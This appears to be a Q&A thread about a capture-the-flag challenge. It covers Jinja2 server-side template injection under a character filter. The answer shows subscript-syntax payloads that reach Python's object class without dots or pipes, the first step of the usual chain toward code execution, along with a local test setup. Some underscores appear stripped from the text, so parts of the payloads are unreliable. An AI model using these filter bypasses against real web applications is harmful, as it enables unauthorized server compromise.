Jinja2 SSTI filter bypasses

I'm doing a Capture The Flag (CTF) and I'm trying to exploit a server vulnerable to Jinja2 Server Side Template Injection (SSTI).
I can't use the following characters: \, |, ,, . and _.
I'm trying to write the following command:

{{''.class.mro()[1].subclasses()}}

Any ideas?

I tried using the attr method, but I can't use it because of the limitation of using | and ..

Most of what you need here is probably explained in the "Variables" chapter and further explained in the "Implementation" note:

> You can use a dot (.) to access attributes of a variable in addition to the standard Python __getitem__ “subscript” syntax ([]).
>
> The following lines do the same thing:
> jinja
> {{ foo.bar }}
> {{ foo['bar'] }}
>

<sup>_Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#variables_&lt;/sup>

Then, later:
> foo['bar'] works mostly the same with a small difference in sequence:
>
> * check for an item 'bar' in foo. (foo.__getitem__('bar'))
> * if there is not, check for an attribute called bar on foo. (getattr(foo, 'bar'))
> * if there is not, return an undefined object.

<sup>_Source: https://jinja.palletsprojects.com/en/3.1.x/templates/#notes-on-subscriptions_&lt;/sup>

So, if I try this kind of thing on a Jinja environment:

{{ ''['__class__']['mro']()[1] }}

I do indeed get a <class 'object'> as a return.

Here, I was not able to achieve ''['class'], but I can achieve it using dict['class'], on the other hand:

{{ dict['class']['mro']()[1] }}

As for the call to the .subclasses() method, it is unclear if this comes from your example implementation or from somewhere else.

Testing environment:

├── jinja.py
└── templates
    └── template.html.j2

jinja.py:

from jinja2 import Environment, FileSystemLoader

environment = Environment(loader=FileSystemLoader('templates/'))
template = environment.get_template('template.html.j2')
print(template.render())

templates/template.html.j2:

{{ dict['class']['mro']()[1] }}

Output:

<class 'object'>